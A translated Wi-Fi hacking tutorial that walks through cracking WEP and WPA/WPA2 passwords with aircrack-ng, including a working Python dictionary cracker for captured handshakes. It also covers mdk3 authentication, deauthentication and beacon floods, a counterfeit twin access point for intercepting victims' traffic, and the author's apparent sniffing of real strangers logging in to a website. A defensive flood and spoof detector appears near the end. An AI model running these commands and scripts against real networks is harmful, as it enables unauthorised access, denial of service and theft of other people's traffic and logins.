Wireless Hacking: DoS and AP Spoofing

Source: Internet
Author: User

Wireless networks are everywhere now, but whether it is an enterprise deployment or a personal Wi-Fi hotspot, little attention is paid to their security. At the same time, malicious actors and commercial spies are using Wi-Fi as a vector for attacks and data theft.
A wireless network is a convenient way into a LAN. Some may say this is the crudest attack method, but I would say it is also one of the most effective in real attacks.
To do any of this you first need the Wi-Fi password. This time we summarize how to obtain it with the aircrack-ng suite on Linux. In short, follow the steps and you get what you want!
Whatever system you use, first put the wireless NIC into monitor mode so that the tools can see raw 802.11 frames:
iwconfig // list the wireless interfaces
ifconfig wlan0 up // bring up wlan0
airmon-ng start wlan0 // put the NIC into monitor mode; this creates a monitor interface, usually mon0, which the following commands use
WEP
airodump-ng --ivs -w log -c <channel> mon0 // for WEP, --ivs keeps only the initialization vectors, which is all the crack needs, so the capture stays small
aireplay-ng -3 -b <BSSID> -h <clientMAC> mon0 // ARP request replay: re-inject captured ARP requests so the AP produces new IVs fast
aircrack-ng log-01.ivs // crack the captured IVs (airodump-ng appends -01 to the file name given with -w)
That is all WEP takes.
WPA/WPA2
airodump-ng -c <channel> -w log mon0 // for WPA we capture full frames; what we need is the 4-way handshake
aireplay-ng -0 3 -a <BSSID> -c <clientMAC> mon0 // three rounds of deauthentication against a connected client; when it reconnects we capture a complete handshake and airodump-ng shows "WPA handshake" in its header. From then on the capture can be cracked offline
aircrack-ng -w <dictionary> log-01.cap // WPA/WPA2 cracking depends entirely on the dictionary: each candidate is run through PBKDF2 and checked against the handshake MIC, so if the passphrase is not in the dictionary no amount of patience helps
A precomputed hash table (PMKs for one SSID and one dictionary, which is what airolib-ng builds) takes a long time to create, but once built it is dozens of times faster than running aircrack-ng directly against the dictionary. I will write that up and share it when I have time.
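To make the last two points concrete, here is an added example (my code, not part of the original article or of the aircrack-ng project) that does in Python what aircrack-ng does with a dictionary and a captured handshake: derive the PMK from each candidate passphrase with PBKDF2, expand it to the PTK, and check the KCK against the MIC of the second EAPOL message. It also builds the per-SSID PMK table that the paragraph above calls a hash table, and shows why a table built for one SSID is useless against another. The handshake, MACs, nonces, SSID and passphrase are constructed for the example; in practice they come from the airodump-ng .cap file.

```python
"""Offline dictionary attack on a WPA2-PSK 4-way handshake, and the per-SSID PMK table trick."""
import hashlib
import hmac

# 802.1X hdr(4) + desc type(1) + key info(2) + key len(2) + replay ctr(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits).
    # This is the expensive step a dictionary attack repeats for every candidate.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap: bytes, sta: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA) || max(AA,SPA) || min(nonces) || max(nonces))
    b = min(ap, sta) + max(ap, sta) + min(anonce, snonce) + max(anonce, snonce)
    blocks = (hmac.new(pmk, b"Pairwise key expansion\x00" + b + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    # MIC over the whole EAPOL-Key frame with its MIC field zeroed. The low 3 bits of Key Info give
    # the descriptor version: 1 = HMAC-MD5 (WPA/TKIP), 2 = HMAC-SHA1-128 (WPA2/CCMP).
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    version = int.from_bytes(eapol[5:7], "big") & 0x7
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


def build_pmk_table(ssid: str, wordlist) -> dict:
    # The "hash table": a PMK depends only on (passphrase, SSID), so compute it once per SSID and reuse
    # it against every handshake from that network. The table is worthless for any other SSID.
    return {word: pmk_from_passphrase(word, ssid) for word in wordlist}


def crack(hs: dict, wordlist, pmk_table: dict = None):
    """Return the passphrase whose KCK reproduces the captured message-2 MIC, or None."""
    captured_mic = hs["eapol_m2"][MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        pmk = pmk_table.get(word) if pmk_table is not None else None
        if pmk is None:
            pmk = pmk_from_passphrase(word, hs["ssid"])
        kck = derive_ptk(pmk, hs["ap"], hs["sta"], hs["anonce"], hs["snonce"])[:16]  # KCK = PTK[0:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol_m2"]), captured_mic):
            return word
    return None


def make_sample_handshake(passphrase: str, ssid: str) -> dict:
    # Constructed stand-in for an airodump-ng capture: fixed MACs and nonces, and a message 2 whose
    # MIC is computed with the real passphrase, exactly as a real station would have done.
    ap, sta = bytes.fromhex("001122334455"), bytes.fromhex("aabbccddeeff")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    key_info = (0x010A).to_bytes(2, "big")  # descriptor version 2, Pairwise and MIC bits set
    body = (bytes([2]) + key_info + bytes(2) + (1).to_bytes(8, "big") + snonce
            + bytes(16) + bytes(8) + bytes(8) + bytes(16) + bytes(2))  # IV, RSC, ID, MIC (zero), key data len
    m2 = bytes([1, 3]) + len(body).to_bytes(2, "big") + body  # 802.1X version 1, type 3 = EAPOL-Key
    hs = {"ssid": ssid, "ap": ap, "sta": sta, "anonce": anonce, "snonce": snonce, "eapol_m2": m2}
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap, sta, anonce, snonce)[:16]
    hs["eapol_m2"] = m2[:MIC_OFFSET] + eapol_mic(kck, m2) + m2[MIC_OFFSET + 16:]
    return hs


SAMPLE_SSID, SAMPLE_PASSPHRASE = "OfficeWifi", "freebuf-wifi-2013"  # constructed values
SAMPLE_HS = make_sample_handshake(SAMPLE_PASSPHRASE, SAMPLE_SSID)
WORDLIST = ["password", "12345678", "qwertyuiop", SAMPLE_PASSPHRASE, "letmein123"]

if __name__ == "__main__":
    print("aircrack-style:", crack(SAMPLE_HS, WORDLIST))
    print("with PMK table:", crack(SAMPLE_HS, WORDLIST, build_pmk_table(SAMPLE_SSID, WORDLIST)))
    print("table built for another SSID:", crack(SAMPLE_HS, WORDLIST, build_pmk_table("OtherSsid", WORDLIST)))
```

The PBKDF2 call is where practically all the time goes; the PTK expansion and MIC check are a handful of HMACs per candidate. That is why a PMK table pays off when you expect to attack several handshakes from the same SSID, and why changing the SSID to something unique (rather than the router default) defeats tables built in advance.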
OK. Now that we have the password, on to our topic: DoS.
In a wireless network environment there are several common DoS attacks:
Authentication Flood, Deauthentication Flood, Disassociation Flood, RF Jamming, Association Flood and so on.
Exploitation tools
This time we again rely on mdk3, the powerful tool bundled with BackTrack 5 (BT5). Many wireless attack tools are just front ends around mdk3, so its capabilities need no introduction.
Against a wireless router (AP) we can launch an Authentication Flood; the mdk3 mode letter is a. This is a flood attack against the wireless AP, also called an authentication DoS. The principle: send the AP a huge number of fake authentication requests from forged client MACs. Once the requests exceed what the AP can track, the AP drops its existing connections (many also reset), so legitimate users can no longer use the wireless network.
mdk3 mon0 a -a <BSSID> // BSSID = MAC address of the target AP
At the same time, we can see a large number of fake clients connecting to the AP, each with a randomly forged MAC address.

In this mode -a pins the attack to one BSSID, -s caps the sending rate in packets per second (with no -s mdk3 sends as fast as the card allows), and -c tells mdk3 not to check whether the attack succeeded. The monitor interface has to sit on the AP's channel beforehand (iwconfig mon0 channel <n>). Run like this, the wireless network will usually collapse within a few minutes. The problem is: what if we run into an AP that can carry a large number of clients?
Don't worry; use the Deauthentication Flood we used when obtaining the handshake. Recall that aireplay-ng -0 sends deauthentication frames to kick a client off so that we can capture the handshake. aireplay-ng can run the flood too if the count is set to 0 (unlimited) and no single client is specified, but it is far less efficient than mdk3.
This attack is aimed not at the AP but at the clients: mdk3 forges deauthentication and disassociation frames in the AP's name to every client MAC it sees.
mdk3 mon0 d // deauthentication / disassociation flood against every client of every AP in range
Attack started

As you can see, my network becomes intermittent; when I stop the attack, it recovers.

Here -s sets the sending rate in packets per second. The attack is very efficient: clients typically start losing their connection the moment it is launched.
In addition, -w <file> (whitelist: MACs to leave alone) and -b <file> (blacklist: only these MACs are attacked) let us add our own MAC addresses so that the forged AP we set up is never hit by the flood. Each option takes a file containing the MAC addresses, one per line.
Counterfeit AP
First we need a wireless NIC that supports AP (master) mode, or simply a wireless router, or a software hotspot. There are many ways of setting up an AP described online; look them up yourself.
I did not clone the MAC address, so the fake AP can still be told apart.
As you can see, the wireless network above is a forged AP I created with a wireless NIC. Its name, password, encryption method, working channel and working mode are exactly the same as the original AP's. With the original AP under attack and unreachable, the only AP a client can connect to is mine, and a user who notices nothing will assume the original AP is the fake one because it cannot be connected to. We can now capture the packets on our AP's network interface and analyse the traffic.
We can also broadcast fake AP beacons as interference:
mdk3 mon0 b -g -c 11 -h // beacon flood: advertise random fake 802.11g APs on channel 11; -h hops the card onto that channel so the beacons actually go out there
This floods channel 11 with beacons for access points that do not exist.
We can also run
mdk3 mon0 b -n <ESSID> -g -c 11 // beacon flood using one chosen network name (ESSID)
which sends beacons for the given ESSID; -g advertises the fake AP as a standard 54 Mbit 802.11g network.
The other DoS modes are left for the reader to study; space does not allow more here.
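On the defensive side, every DoS mode above leaves a clear signature in a monitor-mode capture, and it is worth knowing what to look for. The following is an added example, not code from the original article or from mdk3, that parses raw 802.11 management frames and flags the three patterns discussed here: a deauthentication/disassociation flood against one BSSID (mdk3 d), an authentication flood from many random client MACs (mdk3 a), and one ESSID beaconed from several BSSIDs (a forged twin AP, or mdk3 b -n). The thresholds, MAC addresses and sample frames are constructed for the example; in practice you would feed it frames read from an airodump-ng capture with a pcap library.

```python
"""Flag 802.11 management-frame floods and spoofed ESSIDs in a monitor-mode capture."""
from collections import defaultdict

SUBTYPES = {8: "beacon", 10: "disassoc", 11: "auth", 12: "deauth"}
BROADCAST = b"\xff" * 6


def parse_mgmt(frame: bytes):
    """Return (subtype, dst, src, bssid, ssid) for a management frame we care about, else None."""
    if len(frame) < 24 or (frame[0] >> 2) & 0x3 != 0:  # Frame Control type bits: 0 = management
        return None
    name = SUBTYPES.get(frame[0] >> 4)
    if name is None:
        return None
    dst, src, bssid = frame[4:10], frame[10:16], frame[16:22]
    ssid = None
    if name == "beacon":
        pos = 24 + 12  # body: timestamp(8) + beacon interval(2) + capability(2), then tagged IEs
        while pos + 2 <= len(frame):
            tag, length = frame[pos], frame[pos + 1]
            if tag == 0:  # IE 0 = SSID
                ssid = frame[pos + 2:pos + 2 + length].decode("utf-8", "replace")
                break
            pos += 2 + length
    return name, dst, src, bssid, ssid


def mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def detect(frames, window=1.0, max_deauth=20, max_new_clients=30):
    """frames: iterable of (timestamp_seconds, raw_80211_frame). Returns a list of alert tuples."""
    deauths = defaultdict(int)      # (bssid, time bucket) -> deauth/disassoc count
    auth_srcs = defaultdict(set)    # (bssid, time bucket) -> distinct STA MACs that authenticated
    ssid_bssids = defaultdict(set)  # ssid -> BSSIDs advertising it
    for ts, raw in frames:
        parsed = parse_mgmt(raw)
        if parsed is None:
            continue
        name, dst, src, bssid, ssid = parsed
        bucket = int(ts // window)
        if name in ("deauth", "disassoc"):
            deauths[(bssid, bucket)] += 1
        elif name == "auth" and dst == bssid:  # station -> AP direction only
            auth_srcs[(bssid, bucket)].add(src)
        elif name == "beacon" and ssid:
            ssid_bssids[ssid].add(bssid)
    alerts = []
    for (bssid, bucket), n in sorted(deauths.items(), key=lambda kv: kv[0][1]):
        if n > max_deauth:  # a real AP almost never emits this many deauths in a second
            alerts.append(("deauth_flood", mac(bssid), bucket, n))
    for (bssid, bucket), srcs in sorted(auth_srcs.items(), key=lambda kv: kv[0][1]):
        if len(srcs) > max_new_clients:  # mdk3 a uses a fresh random MAC per request
            alerts.append(("auth_flood", mac(bssid), bucket, len(srcs)))
    for ssid, bssids in ssid_bssids.items():
        if len(bssids) > 1:  # one ESSID from several BSSIDs: forged twin AP or mdk3 b -n <ESSID>
            alerts.append(("ssid_spoof", ssid, sorted(mac(b) for b in bssids)))
    return alerts


# --- constructed sample capture (not real traffic) ---
def mgmt_frame(subtype, dst, src, bssid, body=b""):
    # Frame Control (type 0, given subtype), duration, addr1..3, sequence control, body
    return bytes([subtype << 4, 0, 0, 0]) + dst + src + bssid + b"\x00\x00" + body


def beacon_body(ssid):
    return bytes(8) + b"\x64\x00" + b"\x11\x04" + bytes([0, len(ssid)]) + ssid.encode()


def fake_mac(i):  # locally administered MACs, the way mdk3 randomizes them
    return bytes([0x02, 0x00, 0x00, 0x00, i >> 8, i & 0xff])


AP, STA = bytes.fromhex("001122334455"), bytes.fromhex("aabbccddeeff")
AUTH_REQ, AUTH_RESP = b"\x00\x00\x01\x00\x00\x00", b"\x00\x00\x02\x00\x00\x00"
BASELINE = [(0.0, mgmt_frame(8, BROADCAST, AP, AP, beacon_body("HomeWifi"))),
            (0.2, mgmt_frame(11, AP, STA, AP, AUTH_REQ)),
            (0.3, mgmt_frame(11, STA, AP, AP, AUTH_RESP)),
            (5.0, mgmt_frame(12, STA, AP, AP, b"\x03\x00"))]  # one legitimate deauth
ATTACK = BASELINE + (
    [(10 + i / 200, mgmt_frame(12, BROADCAST, AP, AP, b"\x07\x00")) for i in range(200)]  # mdk3 d
    + [(20 + i / 50, mgmt_frame(11, AP, fake_mac(i), AP, AUTH_REQ)) for i in range(50)]  # mdk3 a
    + [(30 + i, mgmt_frame(8, BROADCAST, fake_mac(1000 + i), fake_mac(1000 + i), beacon_body("HomeWifi")))
       for i in range(5)])  # mdk3 b -n HomeWifi

if __name__ == "__main__":
    print("baseline:", detect(BASELINE))
    for alert in detect(ATTACK):
        print("attack:", alert)
```

The deauth and authentication checks are bucketed by time because both attacks are rate phenomena; the ESSID check is not, because a second BSSID carrying your network name is suspicious however slowly it beacons. A whitelist of known BSSIDs per ESSID (multi-AP deployments are legitimate) is the obvious refinement.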
Other remarks
Some people argue over whether Windows or Linux is the better penetration platform. Personally I think both have the relevant software, and you can write your own programs or scripts; a "hacker" does not care about the system or the environment. As long as a computer meets their requirements, an attack can be launched from any system. The forged wireless AP in this article was, in fact, set up on Windows.
We study security in order to take security seriously; that is what we learn from constantly changing attack methods. Only by understanding the attacks can we grasp every key point of the defence.
For example, the same airodump-ng we used above also serves to capture packets and find an attacker and their traffic: a burst of deauthentication frames, or dozens of new clients with random MACs appearing within seconds, stands out clearly in a capture.
If each of us learns a little more and shares a little more, network security in China will keep getting better. Finally, beyond translating articles from abroad, let's become real FreeBuf-ers!
In my previous article, "Analysis of wireless network data Snoop technology", I did not show the cracked .cap packets from the Wi-Fi capture.
Once decrypted with the recovered key, the capture is no longer opaque 802.11 frames; the plaintext traffic is visible.
Beijing.55tuan.com, haha, I don't know who is logging in; I am 111. It looks like at least 10 client terminals are connected to this intranet.
End of daydreaming. Don't flame me ~
